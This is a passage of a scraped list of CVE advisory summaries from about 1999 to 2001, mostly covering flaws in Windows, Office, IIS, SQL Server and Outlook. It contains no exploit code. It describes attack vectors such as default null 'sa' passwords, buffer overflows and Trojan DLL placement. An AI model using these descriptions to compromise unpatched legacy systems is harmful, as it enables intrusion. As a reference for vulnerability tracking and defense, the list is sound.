"Winsock Mutex" vulnerability. [CVE-2001-0005] Buffer overflow in the parsing mechanism of the file loader in Microsoft PowerPoint 2000 allows attackers to execute arbitrary commands. [CVE-2000-1227] Windows NT 4.0 and Windows 2000 hosts allow remote attackers to cause a denial of service (unavailable connections) by sending multiple SMB SMBnegprots requests but not reading the response that is sent back. [CVE-2000-1209] The "sa" account is installed with a default null password on (1) Microsoft SQL Server 2000, (2) SQL Server 7.0, and (3) Data Engine (MSDE) 1.0, including third party packages that use these products such as (4) Tumbleweed Secure Mail (MMS) (5) Compaq Insight Manager, and (6) Visio 2000, which allows remote attackers to gain privileges, as exploited by worms such as Voyager Alpha Force and Spida. [CVE-2000-1200] Windows NT allows remote attackers to list all users in a domain by obtaining the domain SID with the LsaQueryInformationPolicy policy function via a null session and using the SID to list the users. [CVE-2000-1149] Buffer overflow in RegAPI.DLL used by Windows NT 4.0 Terminal Server allows remote attackers to execute arbitrary commands via a long username, aka the "Terminal Server Login Buffer Overflow" vulnerability. [CVE-2000-1139] The installation of Microsoft Exchange 2000 before Rev. A creates a user account with a known password, which could allow attackers to gain privileges, aka the "Exchange User Account" vulnerability. [CVE-2000-1111] Telnet Service for Windows 2000 Professional does not properly terminate incomplete connection attempts, which allows remote attackers to cause a denial of service by connecting to the server and not providing any input. [CVE-2000-1105] The ixsso.query ActiveX Object is marked as safe for scripting, which allows malicious web site operators to embed a script that remotely determines the existence of files on visiting Windows 2000 systems that have Indexing Services enabled. [CVE-2000-1090] Microsoft IIS for Far East editions 4.0 and 5.0 allows remote attackers to read source code for parsed pages via a malformed URL that uses the lead-byte of a double-byte character. [CVE-2000-1089] Buffer overflow in Microsoft Phone Book Service allows local users to execute arbitrary commands, aka the "Phone Book Service Buffer Overflow" vulnerability. [CVE-2000-1088] The xp_SetSQLSecurity function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1087] The xp_proxiedmetadata function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1086] The xp_printstatements function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1085] The xp_peekqueue function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1084] The xp_updatecolvbm function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1083] The xp_showcolv function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1082] The xp_enumresultset function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1081] The xp_displayparamstmt function in SQL Server and Microsoft SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1071] The GUI installation for iCal 2.1 Patch 2 disables access control for the X server using an "xhost +" command, which allows remote attackers to monitor X Windows events and gain privileges. [CVE-2000-1061] Microsoft Virtual Machine (VM) in Internet Explorer 4.x and 5.x allows an unsigned applet to create and use ActiveX controls, which allows a remote attacker to bypass Internet Explorer's security settings and execute arbitrary commands via a malicious web page or email, aka the "Microsoft VM ActiveX Component" vulnerability. [CVE-2000-1060] The default configuration of XFCE 3.5.1 bypasses the Xauthority access control mechanism with an "xhost + localhost" command in the xinitrc program, which allows local users to sniff X Windows traffic and gain privileges. [CVE-2000-1059] The default configuration of the Xsession file in Mandrake Linux 7.1 and 7.0 bypasses the Xauthority access control mechanism with an "xhost + localhost" command, which allows local users to sniff X Windows events and gain privileges. [CVE-2000-1034] Buffer overflow in the System Monitor ActiveX control in Windows 2000 allows remote attackers to execute arbitrary commands via a long LogFileName parameter in HTML source code, aka the "ActiveX Parameter Validation" vulnerability. [CVE-2000-1006] Microsoft Exchange Server 5.5 does not properly handle a MIME header with a blank charset specified, which allows remote attackers to cause a denial of service via a charset="" command, aka the "Malformed MIME Header" vulnerability. [CVE-2000-1003] NETBIOS client in Windows 95 and Windows 98 allows a remote attacker to cause a denial of service by changing a file sharing service to return an unknown driver type, which causes the client to crash. [CVE-2000-0991] Buffer overflow in Hilgraeve, Inc. HyperTerminal client on Windows 98, ME, and 2000 allows remote attackers to execute arbitrary commands via a long telnet URL, aka the "HyperTerminal Buffer Overflow" vulnerability. [CVE-2000-0983] Microsoft NetMeeting with Remote Desktop Sharing enabled allows remote attackers to cause a denial of service (CPU utilization) via a sequence of null bytes to the NetMeeting port, aka the "NetMeeting Desktop Sharing" vulnerability. [CVE-2000-0980] NMPI (Name Management Protocol on IPX) listener in Microsoft NWLink does not properly filter packets from a broadcast address, which allows remote attackers to cause a broadcast storm and flood the network. [CVE-2000-0979] File and Print Sharing service in Windows 95, Windows 98, and Windows Me does not properly check the password for a file share, which allows remote attackers to bypass share access controls by sending a 1-byte password that matches the first character of the real password, aka the "Share Level Password" vulnerability. [CVE-2000-0933] The Input Method Editor (IME) in the Simplified Chinese version of Windows 2000 does not disable access to privileged functionality that should normally be restricted, which allows local users to gain privileges, aka the "Simplified Chinese IME State Recognition" vulnerability. [CVE-2000-0885] Buffer overflows in Microsoft Network Monitor (Netmon) allow remote attackers to execute arbitrary commands via a long Browser Name in a CIFS Browse Frame, a long SNMP community name, or a long username or filename in an SMB session, aka the "Netmon Protocol Parsing" vulnerability. NOTE: It is highly likely that this candidate will be split into multiple candidates. [CVE-2000-0854] When a Microsoft Office 2000 document is launched, the directory of that document is first used to locate DLL's such as riched20.dll and msi.dll, which could allow an attacker to execute arbitrary commands by inserting a Trojan Horse DLL into the same directory as the document. [CVE-2000-0851] Buffer overflow in the Still Image Service in Windows 2000 allows local users to gain additional privileges via a long WM_USER message, aka the "Still Image Service Privilege Escalation" vulnerability. [CVE-2000-0834] The Windows 2000 telnet client attempts to perform NTLM authentication by default, which allows remote attackers to capture and replay the NTLM challenge/response via a telnet:// URL that points to the malicious server, aka the "Windows 2000 Telnet Client NTLM Authentication" vulnerability. [CVE-2000-0830] annclist.exe in webTV for Windows allows remote attackers to cause a denial of service by via a large, malformed UDP packet to ports 22701 through 22705. [CVE-2000-0817] Buffer overflow in the HTTP protocol parser for Microsoft Network Monitor (Netmon) allows remote attackers to execute arbitrary commands via malformed data, aka the "Netmon Protocol Parsing" vulnerability. [CVE-2000-0788] The Mail Merge tool in Microsoft Word does not prompt the user before executing Visual Basic (VBA) scripts in an Access database, which could allow an attacker to execute arbitrary commands. [CVE-2000-0777] The password protection feature of Microsoft Money can store the password in plaintext, which allows attackers with physical access to the system to obtain the password, aka the "Money Password" vulnerability. [CVE-2000-0765] Buffer overflow in the HTML interpreter in Microsoft Office 2000 allows an attacker to execute arbitrary commands via a long embedded object tag, aka the "Microsoft Office HTML Object Tag" vulnerability. [CVE-2000-0756] Microsoft Outlook 2000 does not properly process long or malformed fields in vCard (.vcf) files, which allows attackers to cause a denial of service. [CVE-2000-0753] The Microsoft Outlook mail client identifies the physical path of the sender's machine within a winmail.dat attachment to Rich Text Format (RTF) files. [CVE-2000-0737] The Service Control Manager (SCM) in Windows 2000 creates predictable named pipes, which allows a local user with console access to gain administrator privileges, aka the "Service Control Manager Named Pipe Impersonation" vulnerability. [CVE-2000-0710] The shtml.exe component of Microsoft FrontPage 2000 Server Extensions 1.1 allows remote attackers determine the physical path of the server components by requesting an invalid URL whose name includes a standard DOS device name. [CVE-2000-0709] The shtml.exe component of Microsoft FrontPage 2000 Server Extensions 1.1 allows remote attackers to cause a denial of service in some components by requesting a URL whose name includes a standard DOS device name. [CVE-2000-0663] The registry entry for the Windows Shell executable (Explorer.exe) in Windows NT and Windows 2000 uses a relative path name, which allows local users to execute arbitrary commands by inserting a Trojan Horse named Explorer.exe into the %Systemdrive% directory, aka the "Relative Shell Path" vulnerability. [CVE-2000-0662] Internet Explorer 5.x and Microsoft Outlook allows remote attackers to read arbitrary files by redirecting the contents of an IFRAME using the DHTML Edit Control (DHTMLED). [CVE-2000-0654] Microsoft Enterprise Manager allows local users to obtain database passwords via the Data Transformation Service (DTS) package Registered Servers Dialog dialog, aka a variant of the "DTS Password" vulnerability. [CVE-2000-0637] Microsoft Excel 97 and 2000 allows an attacker to execute arbitrary commands by specifying a malicious .dll using the Register.ID function, aka the "Excel REGISTER.ID Function" vulnerability. [CVE-2000-0621] Microsoft Outlook 98 and 2000, and Outlook Express 4.0x and 5.0x, allow remote attackers to read files on the client's system via a malformed HTML message that stores files outside of the cache, aka the "Cache Bypass" vulnerability. [CVE-2000-0612] Windows 95 and Windows 98 do not properly process spoofed ARP packets, which allows remote attackers to overwrite static entries in the cache table. [CVE-2000-0603] Microsoft SQL Server 7.0 allows a local user to bypass permissions for stored procedures by referencing them via a temporary stored procedure, aka the "Stored Procedure Permissions" vulnerability. [CVE-2000-0597] Microsoft Office 2000 (Excel and PowerPoint) and PowerPoint 97 are marked as safe for scripting, which allows remote attackers to force Internet Explorer or some email clients to save files to arbitrary locations via the Visual Basic for Applications (VBA) SaveAs function, aka the "Office HTML Script" vulnerability. [CVE-2000-0596] Internet Explorer 5.x does not warn a user before opening a Microsoft Access database file that is referenced within ActiveX OBJECT tags in an HTML document, which could allow remote attackers to execute arbitrary commands, aka the "IE Script" vulnerability. [CVE-2000-0581] Windows 2000 Telnet Server allows remote attackers to cause a denial of service by sending a continuous stream of binary zeros, which causes the server to crash. [CVE-2000-0580] Windows 2000 Server allows remote attackers to cause a denial of service by sending a continuous stream of binary zeros to various TCP and UDP ports, which significantly increases the CPU utilization. [CVE-2000-0567] Buffer overflow in Microsoft Outlook and Outlook Express allows remote attackers to execute arbitrary commands via a long Date field in an email header, aka the "Malformed E-mail Header" vulnerability. [CVE-2000-0563] The URLConnection function in MacOS Runtime Java (MRJ) 2.1 and earlier and the Microsoft virtual machine (VM) for MacOS allows a malicious web site operator to connect to arbitrary hosts using a HTTP redirection, in violation of the Java security model. [CVE-2000-0544] Windows NT and Windows 2000 hosts allow a remote attacker to cause a denial of service via malformed DCE/RPC SMBwriteX requests that contain an invalid data length. [CVE-2000-0524] Microsoft Outlook and Outlook Express allow remote attackers to cause a denial of service by sending email messages with blank fields such as BCC, Reply-To, Return-Path, or From. [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters. [CVE-2000-0487] The Protected Store in Windows 2000 does not properly select the strongest encryption when available, which causes it to use a default of 40-bit encryption instead of 56-bit DES encryption, aka the "Protected Store Key Length" vulnerability. [CVE-2000-0485] Microsoft SQL Server allows local users to obtain database passwords via the Data Transformation Service (DTS) package Properties dialog, aka the "DTS Password" vulnerability. [CVE-2000-0475] Windows 2000 allows a local user process to access another user's desktop within the same windows station, aka the "Desktop Separation" vulnerability. [CVE-2000-0420] The default configuration of SYSKEY in Windows 2000 stores the startup key in the registry, which could allow an attacker tor ecover it and use it to decrypt Encrypted File System (EFS) data. [CVE-2000-0403] The CIFS Computer Browser service on Windows NT 4.0 allows a remote attacker to cause a denial of service by sending a large number of host announcement requests to the master browse tables, aka the "HostAnnouncement Flooding" or "HostAnnouncement Frame" vulnerability. [CVE-2000-0402] The Mixed Mode authentication capability in Microsoft SQL Server 7.0 stores the System Administrator (sa) account in plaintext in a log file which is readable by any user, aka the "SQL Server 7.0 Service Pack Password" vulnerability. [CVE-2000-0400] The Microsoft Active Movie ActiveX Control in Internet Explorer 5 does not restrict which file types can be downloaded, which allows an attacker to download any type of file to a user's system by encoding it within an email message or news post. [CVE-2000-0377] The Remote Registry server in Windows NT 4.0 allows local authenticated users to cause a denial of service via a malformed request, which causes the winlogon process to fail, aka the "Remote Registry Access Authentication" vulnerability. [CVE-2000-0347] Windows 95 and Windows 98 allow a remote attacker to cause a denial of service via a NetBIOS session request packet with a NULL source name. [CVE-2000-0330] The networking software in Windows 95 and Windows 98 allows remote attackers to execute commands via a long file name string, aka the "File Access URL" vulnerability. [CVE-2000-0329] A Microsoft ActiveX control allows a remote attacker to execute a malicious cabinet file via an attachment and an embedded script in an HTML mail, aka the "Active Setup Control" vulnerability. [CVE-2000-0328] Windows NT 4.0 generates predictable random TCP initial sequence numbers (ISN), which allows remote attackers to perform spoofing and session hijacking. [CVE-2000-0327] Microsoft Virtual Machine (VM) allows remote attackers to escape the Java sandbox and execute commands via an applet containing an illegal cast operation, aka the "Virtual Machine Verifier" vulnerability. [CVE-2000-0325] The Microsoft Jet database engine allows an attacker to execute commands via a database query, aka the "VBA Shell" vulnerability. [CVE-2000-0323] The Microsoft Jet database engine allows an attacker to modify text files via a database query, aka the "Text I-ISAM" vulnerability. [CVE-2000-0311] The Windows 2000 domain controller allows a malicious user to modify Active Directory information by modifying an unprotected attribute, aka the "Mixed Object Access" vulnerability. [CVE-2000-0305] Windows 95, Windows 98, Windows 2000, Windows NT 4.0, and Terminal Server systems allow a remote attacker to cause a denial of service by sending a large number of identical fragmented IP packets, aka jolt2 or the "IP Fragment Reassembly" vulnerability. [CVE-2000-0304] Microsoft IIS 4.0 and 5.0 with the IISADMPWD virtual directory installed allows a remote attacker to cause a denial of service via a malformed request to the inetinfo.exe program, aka the "Undelimited .HTR Request" vulnerability. [CVE-2000-0302] Microsoft Index Server allows remote attackers to view the source code of ASP files by appending a %20 to the filename in the CiWebHitsFile argument to the null.htw URL. [CVE-2000-0298] The unattended installation of Windows 2000 with the OEMPreinstall option sets insecure permissions for the All Users and Default Users directories. [CVE-2000-0277] Microsoft Excel 97 and 2000 does not warn the user when executing Excel Macro Language (XLM) macros in external text files, which could allow an attacker to execute a macro virus, aka the "XLM Text Macro" vulnerability. [CVE-2000-0260] Buffer overflow in the dvwssr.dll DLL in Microsoft Visual Interdev 1.0 allows users to cause a denial of service or execute commands, aka the "Link View Server-Side Component" vulnerability. [CVE-2000-0259] The default permissions for the Cryptography\Offload registry key used by the OffloadModExpo in Windows NT 4.0 allows local users to obtain compromise the cryptographic keys of other users. [CVE-2000-0232] Microsoft TCP/IP Printing Services, aka Print Services for Unix, allows an attacker to cause a denial of service via a malformed TCP/IP print request. [CVE-2000-0222] The installation for Windows 2000 does not activate the Administrator password until the system has rebooted, which allows remote attackers to connect to the ADMIN$ share without a password until the reboot occurs. [CVE-2000-0211] The Windows Media server allows remote attackers to cause a denial of service via a series of client handshake packets that are sent in an improper sequence, aka the "Misordered Windows Media Services Handshake" vulnerability. [CVE-2000-0202] Microsoft SQL Server 7.0 and Microsoft Data Engine (MSDE) 1.0 allow remote attackers to gain privileges via a malformed Select statement in an SQL query. [CVE-2000-0201] The window.showHelp() method in Internet Explorer 5.x does not restrict HTML help files (.chm) to be executed from the local host, which allows remote attackers to execute arbitrary commands via Microsoft Networking. [CVE-2000-0200] Buffer overflow in Microsoft Clip Art Gallery allows remote attackers to cause a denial of service or execute commands via a malformed CIL (clip art library) file, aka the "Clip Art Buffer Overrun" vulnerability. [CVE-2000-0199] When a new SQL Server is registered in Enterprise Manager for Microsoft SQL Server 7.0 and the "Always prompt for login name and password" option is not set, then the Enterprise Manager uses weak encryption to store the login ID and password. [CVE-2000-0197] The Windows NT scheduler uses the drive mapping of the interactive user who is currently logged onto the system, which allows the local user to gain privileges by providing a Trojan horse batch file in place of the original batch file. [CVE-2000-0162] The Microsoft virtual machine (VM) in Internet Explorer 4.x and 5.x allows a remote attacker to read files via a malicious Java applet that escapes the Java sandbox, aka the "VM File Reading" vulnerability. [CVE-2000-0161] Sample web sites on Microsoft Site Server 3.0 Commerce Edition do not validate an identification number, which allows remote attackers to execute SQL commands. [CVE-2000-0160] The Microsoft Active Setup ActiveX component in Internet Explorer 4.x and 5.x allows a remote attacker to install software components without prompting the user by stating that the software's manufacturer is Microsoft. [CVE-2000-0155] Windows NT Autorun executes the autorun.inf file on non-removable media, which allows local attackers to specify an alternate program to execute when other users access a drive. [CVE-2000-0132] Microsoft Java Virtual Machine allows remote attackers to read files via the getSystemResourceAsStream function. [CVE-2000-0121] The Recycle Bin utility in Windows NT and Windows 2000 allows local users to read or modify files by creating a subdirectory with the victim's SID in the recycler directory, aka the "Recycle Bin Creation" vulnerability. [CVE-2000-0119] The default configurations for McAfee Virus Scan and Norton Anti-Virus virus checkers do not check files in the RECYCLED folder that is used by the Windows Recycle Bin utility, which allows attackers to store malicious code without detection. [CVE-2000-0098] Microsoft Index Server allows remote attackers to determine the real path for a web directory via a request to an Internet Data Query file that does not exist. [CVE-2000-0097] The WebHits ISAPI filter in Microsoft Index Server allows remote attackers to read arbitrary files, aka the "Malformed Hit-Highlighting Argument" vulnerability. [CVE-2000-0073] Buffer overflow in Microsoft Rich Text Format (RTF) reader allows attackers to cause a denial of service via a malformed control word. [CVE-2000-0070] NtImpersonateClientOfPort local procedure call in Windows NT 4.0 allows local users to gain privileges, aka "Spoofed LPC Port Request." [CVE-2000-0053] Microsoft Commercial Internet System (MCIS) IMAP server allows remote attackers to cause a denial of service via a malformed IMAP request. [CVE-1999-1593] Windows Internet Naming Service (WINS) allows remote attackers to cause a denial of service (connectivity loss) or steal credentials via a 1Ch registration that causes WINS to change the domain controller to point to a malicious server. NOTE: this problem may be limited when Windows 95/98 clients are used, or if the primary domain controller becomes unavailable. [CVE-1999-1591] Microsoft Internet Information Services (IIS) server 4.0 SP4, without certain hotfixes released for SP4, does not require authentication credentials under certain conditions, which allows remote attackers to bypass authentication requirements, as demonstrated by connecting via Microsoft Visual InterDev 6.0. [CVE-1999-1584] Unknown vulnerability in (1) loadmodule, and (2) modload if modload is installed with setuid/setgid privileges, in SunOS 4.1.1 through 4.1.3c, and Open Windows 3.0, allows local users to gain root privileges via environment variables, a different vulnerability than CVE-1999-1586. [CVE-1999-1581] Memory leak in Simple Network Management Protocol (SNMP) agent (snmp.exe) for Windows NT 4.0 before Service Pack 4 allows remote attackers to cause a denial of service (memory consumption) via a large number of SNMP packets with Object Identifiers (OIDs) that cannot be decoded. [CVE-1999-1579] The Cenroll ActiveX control (xenroll.dll) for Terminal Server Editions of Windows NT 4.0 and Windows NT Server 4.0 before SP6 allows remote attackers to cause a denial of service (resource consumption) by creating a large number of arbitrary files on the target machine. [CVE-1999-1556] Microsoft SQL Server 6.5 uses weak encryption for the password for the SQLExecutiveCmdExec account and stores it in an accessible portion of the registry, which could allow local users to gain privileges by reading and decrypting the CmdExecAccount value. [CVE-1999-1544] Buffer overflow in FTP server in Microsoft IIS 3.0 and 4.0 allows local and sometimes remote attackers to cause a denial of service via a long NLST (ls) command. [CVE-1999-1531] Buffer overflow in IBM HomePagePrint 1.0.7 for Windows98J allows a malicious Web site to execute arbitrary code on a viewer's system via a long IMG_SRC HTML tag. [CVE-1999-1520] A configuration problem in the Ad Server Sample directory (AdSamples) in Microsoft Site Server 3.0 allows an attacker to obtain the SITE.CSC file, which exposes sensitive SQL database information. [CVE-1999-1476] A bug in Intel Pentium processor (MMX and Overdrive) allows local users to cause a denial of service (hang) in Intel-based operating systems such as Windows NT and Windows 95, via an invalid instruction, aka the "Invalid Operand with Locked CMPXCHG8B Instruction" problem. [CVE-1999-1463] Windows NT 4.0 before SP3 allows remote attackers to bypass firewall restrictions or cause a denial of service (crash) by sending improperly fragmented IP packets without the first fragment, which the TCP/IP stack incorrectly reassembles into a valid session. [CVE-1999-1455] RSH service utility RSHSVC in Windows NT 3.5 through 4.0 does not properly restrict access as specified in the .Rhosts file when a user comes from an authorized host, which could allow unauthorized users to access the service by logging in from an authorized host. [CVE-1999-1454] Macromedia "The Matrix" screen saver on Windows 95 with the "Password protected" option enabled allows attackers with physical access to the machine to bypass the password prompt by pressing the ESC (Escape) key. [CVE-1999-1452] GINA in Windows NT 4.0 allows attackers with physical access to display a portion of the clipboard of the user who has locked the workstation by pasting (CTRL-V) the contents into the username prompt. [CVE-1999-1430] PIM software for Royal daVinci does not properly password-protext access to data stored in the .mdb (Microsoft Access) file, which allows local users to read the data without a password by directly accessing the files with a different application, such as Access. [CVE-1999-1387] Windows NT 4.0 SP2 allows remote attackers to cause a denial of service (crash), possibly via malformed inputs or packets, such as those generated by a Linux smbmount command that was compiled on the Linux 2.0.29 kernel but executed on Linux 2.0.25. [CVE-1999-1380] Symantec Norton Utilities 2.0 for Windows 95 marks the TUNEOCX.OCX ActiveX control as safe for scripting, which allows remote attackers to execute arbitrary commands via the run option through malicious web pages that are accessed by browsers such as Internet Explorer 3.0. [CVE-1999-1368] AV Option for MS Exchange Server option for InoculateIT 4.53, and possibly other versions, only scans the Inbox folder tree of a Microsoft Exchange server, which could allow viruses to escape detection if a user's rules cause the message to be moved to a different mailbox. [CVE-1999-1365] Windows NT searches a user's home directory (%systemroot% by default) before other directories to find critical programs such as NDDEAGNT.EXE, EXPLORER.EXE, USERINIT.EXE or TASKMGR.EXE, which could allow local users to bypass access restrictions or gain privileges by placing a Trojan horse program into the root directory, which is writable by default. [CVE-1999-1364] Windows NT 4.0 allows local users to cause a denial of service (crash) via an illegal kernel mode address to the functions (1) GetThreadContext or (2) SetThreadContext. [CVE-1999-1363] Windows NT 3.51 and 4.0 allow local users to cause a denial of service (crash) by running a program that creates a large number of locks on a file, which exhausts the NonPagedPool. [CVE-1999-1362] Win32k.sys in Windows NT 4.0 before SP2 allows local users to cause a denial of service (crash) by calling certain WIN32K functions with incorrect parameters. [CVE-1999-1361] Windows NT 3.51 and 4.0 running WINS (Windows Internet Name Service) allows remote attackers to cause a denial of service (resource exhaustion) via a flood of malformed packets, which causes the server to slow down and fill the event logs with error messages. [CVE-1999-1360] Windows NT 4.0 allows local users to cause a denial of service via a user mode application that closes a handle that was opened in kernel mode, which causes a crash when the kernel attempts to close the handle. [CVE-1999-1359] When the Ntconfig.pol file is used on a server whose name is longer than 13 characters, Windows NT does not properly enforce policies for global groups, which could allow users to bypass restrictions that were intended by those policies. [CVE-1999-1358] When an administrator in Windows NT or Windows 2000 changes a user policy, the policy is not properly updated if the local ntconfig.pol is not writable by the user, which could allow local users to bypass restrictions that would otherwise be enforced by the policy, possibly by changing the policy file to be read-only. [CVE-1999-1356] Compaq Integration Maintenance Utility as used in Compaq Insight Manager agent before SmartStart 4.50 modifies the legal notice caption (LegalNoticeCaption) and text (LegalNoticeText) in Windows NT, which could produce a legal notice that is in violation of the security policy. [CVE-1999-1324] VAXstations running Open VMS 5.3 through 5.5-2 with VMS DECwindows or MOTIF do not properly disable access to user accounts that exceed the break-in limit threshold for failed login attempts, which makes it easier for attackers to conduct brute force password guessing. [CVE-1999-1317] Windows NT 4.0 SP4 and earlier allows local users to gain privileges by modifying the symbolic link table in the \?? object folder using a different case letter (upper or lower) to point to a different device. [CVE-1999-1316] Passfilt.dll in Windows NT SP2 allows users to create a password that contains the user's name, which could make it easier for an attacker to guess. [CVE-1999-1297] cmdtool in OpenWindows 3.0 and XView 3.0 in SunOS 4.1.4 and earlier allows attackers with physical access to the system to display unechoed characters (such as those from password prompts) via the L2/AGAIN key. [CVE-1999-1294] Office Shortcut Bar (OSB) in Windows 3.51 enables backup and restore permissions, which are inherited by programs such as File Manager that are started from the Shortcut Bar, which could allow local users to read folders for which they do not have permission. [CVE-1999-1289] ICQ 98 beta on Windows NT leaks the internal IP address of a client in the TCP data segment of an ICQ packet instead of the public address (e.g. through NAT), which provides remote attackers with potentially sensitive information about the client or the internal network configuration. [CVE-1999-1279] An interaction between the AS/400 shared folders feature and Microsoft SNA Server 3.0 and earlier allows users to view each other's folders when the users share the same Local APPC LU. [CVE-1999-1259] Microsoft Office 98, Macintosh Edition, does not properly initialize the disk space used by Office 98 files and effectively inserts data from previously deleted files into the Office file, which could allow attackers to obtain sensitive information. [CVE-1999-1254] Windows 95, 98, and NT 4.0 allow remote attackers to cause a denial of service by spoofing ICMP redirect messages from a router, which causes Windows to change its routing tables. [CVE-1999-1246] Direct Mailer feature in Microsoft Site Server 3.0 saves user domain names and passwords in plaintext in the TMLBQueue network share, which has insecure default permissions, allowing remote attackers to read the passwords and gain privileges. [CVE-1999-1234] LSA (LSASS.EXE) in Windows NT 4.0 allows remote attackers to cause a denial of service via a NULL policy handle in a call to (1) SamrOpenDomain, (2) SamrEnumDomainUsers, and (3) SamrQueryDomainInfo. [CVE-1999-1222] Netbt.sys in Windows NT 4.0 allows remote malicious DNS servers to cause a denial of service (crash) by returning 0.0.0.0 as the IP address for a DNS host name lookup. [CVE-1999-1217] The PATH in Windows NT includes the current working directory (.), which could allow local users to gain privileges by placing Trojan horse programs with the same name as commonly used system programs into certain directories. [CVE-1999-1206] SystemSoft SystemWizard package in HP Pavilion PC with Windows 98, and possibly other platforms and operating systems, installs two ActiveX controls that are marked as safe for scripting, which allows remote attackers to execute arbitrary commands via a malicious web page that references (1) the Launch control, or (2) the RegObj control. [CVE-1999-1201] Windows 95 and Windows 98 systems, when configured with multiple TCP/IP stacks bound to the same MAC address, allow remote attackers to cause a denial of service (traffic amplification) via a certain ICMP echo (ping) packet, which causes all stacks to send a ping response, aka TCP Chorusing. [CVE-1999-1189] Buffer overflow in Netscape Navigator/Communicator 4.7 for Windows 95 and Windows 98 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long argument after the ? character in a URL that references an .asp, .cgi, .html, or .pl file. [CVE-1999-1164] Microsoft Outlook client allows remote attackers to cause a denial of service by sending multiple email messages with the same X-UIDL headers, which causes Outlook to hang. [CVE-1999-1157] Tcpip.sys in Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service via an ICMP Subnet Mask Address Request packet, when certain multiple IP addresses are bound to the same network interface. [CVE-1999-1133] HP-UX 9.x and 10.x running X windows may allow local attackers to gain privileges via (1) vuefile, (2) vuepad, (3) dtfile, or (4) dtpad, which do not authenticate users. [CVE-1999-1132] Windows NT 4.0 allows remote attackers to cause a denial of service (crash) via extra source routing data such as (1) a Routing Information Field (RIF) field with a hop count greater than 7, or (2) a list containing duplicate Token Ring IDs. [CVE-1999-1128] Internet Explorer 3.01 on Windows 95 allows remote malicious web sites to execute arbitrary commands via a .isp file, which is automatically downloaded and executed without prompting the user. [CVE-1999-1127] Windows NT 4.0 does not properly shut down invalid named pipe RPC connections, which allows remote attackers to cause a denial of service (resource exhaustion) via a series of connections containing malformed data, aka the "Named Pipes Over RPC" vulnerability. [CVE-1999-1110] Windows Media Player ActiveX object as used in Internet Explorer 5.0 returns a specific error code when a file does not exist, which allows remote malicious web sites to determine the existence of files on the client. [CVE-1999-1105] Windows 95, when Remote Administration and File Sharing for NetWare Networks is enabled, creates a share (C$) when an administrator logs in remotely, which allows remote attackers to read arbitrary files by mapping the network drive. [CVE-1999-1104] Windows 95 uses weak encryption for the password list (.pwl) file used when password caching is enabled, which allows local users to gain privileges by decrypting the passwords. [CVE-1999-1097] Microsoft NetMeeting 2.1 allows one client to read the contents of another client's clipboard via a CTRL-C in the chat box when the box is empty. [CVE-1999-1065] Palm Pilot HotSync Manager 3.0.4 in Windows 98 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long string to port 14238 while the manager is in network mode. [CVE-1999-1055] Microsoft Excel 97 does not warn the user before executing worksheet functions, which could allow attackers to execute arbitrary commands by using the CALL function to execute a malicious DLL, aka the Excel "CALL Vulnerability." [CVE-1999-1052] Microsoft FrontPage stores form results in a default location in /_private/form_results.txt, which is world-readable and accessible in the document root, which allows remote attackers to read possibly sensitive information submitted by other users. [CVE-1999-1043] Microsoft Exchange Server 5.5 and 5.0 does not properly handle (1) malformed NNTP data, or (2) malformed SMTP data, which allows remote attackers to cause a denial of service (application error). [CVE-1999-1033] Microsoft Outlook Express before 4.72.3612.1700 allows a malicious user to send a message that contains a .., which can inadvertently cause Outlook to re-enter POP3 command mode and cause the POP3 session to hang. [CVE-1999-1016] Microsoft HTML control as used in (1) Internet Explorer 5.0, (2) FrontPage Express, (3) Outlook Express 5, and (4) Eudora, and possibly others, allows remote malicious web site or HTML emails to cause a denial of service (100% CPU consumption) via large HTML form fields such as text inputs in a table cell. [CVE-1999-1011] The Remote Data Service (RDS) DataFactory component of Microsoft Data Access Components (MDAC) in IIS 3.x and 4.x exposes unsafe methods, which allows remote attackers to execute arbitrary commands. [CVE-1999-0999] Microsoft SQL 7.0 server allows a remote attacker to cause a denial of service via a malformed TDS packet. [CVE-1999-0995] Windows NT Local Security Authority (LSA) allows remote attackers to cause a denial of service via malformed arguments to the LsaLookupSids function which looks up the SID, aka "Malformed Security Identifier Request." [CVE-1999-0994] 